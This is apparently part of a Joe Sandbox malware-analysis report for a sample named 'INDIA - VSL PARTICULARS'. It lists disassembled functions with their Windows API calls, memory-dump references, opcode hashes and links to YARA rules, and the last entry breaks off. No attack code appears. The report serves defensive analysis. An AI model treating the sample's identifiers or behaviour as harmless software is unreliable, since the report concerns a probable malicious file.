                              Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                              Download Yara Rule
                              APIs
                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                              Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorLast
                              • String ID: NULL Pointer assignment$Not an Object type
                              • API String ID: 2487901850-572801152
                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                              Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageSend
                              • String ID:
                              • API String ID: 1871949834-0
                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                              Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                              Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                              • SendMessageW.USER32 ref: 00471AE3
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 3611059338-0
                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                              Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DestroyWindow$DeleteObject$IconMove
                              • String ID:
                              • API String ID: 1640429340-0
                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                              Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcslen.LIBCMT ref: 004438CD
                              • _wcslen.LIBCMT ref: 004438E6
                              • _wcstok.LIBCMT ref: 004438F8
                              • _wcslen.LIBCMT ref: 0044390C
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                              • _wcstok.LIBCMT ref: 00443931
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                              • String ID:
                              • API String ID: 3632110297-0
                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                              Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteMenuObject$IconWindow
                              • String ID:
                              • API String ID: 752480666-0
                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                              Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                              Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                              Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                              Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 004555C7
                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                              • String ID:
                              • API String ID: 3691411573-0
                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                              Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                              • LineTo.GDI32(?,?,?), ref: 004472AC
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                              • LineTo.GDI32(?,?,?), ref: 004472C6
                              • EndPath.GDI32(?), ref: 004472D6
                              • StrokePath.GDI32(?), ref: 004472E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                              • String ID:
                              • API String ID: 372113273-0
                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                              Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(00000000), ref: 0044CC6D
                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDevice$Release
                              • String ID:
                              • API String ID: 1035833867-0
                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                              Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0041708E
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __amsg_exit.LIBCMT ref: 004170AE
                              • __lock.LIBCMT ref: 004170BE
                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                              • _free.LIBCMT ref: 004170EE
                              • InterlockedIncrement.KERNEL32(00A02DB0), ref: 00417106
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                              • String ID:
                              • API String ID: 3470314060-0
                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
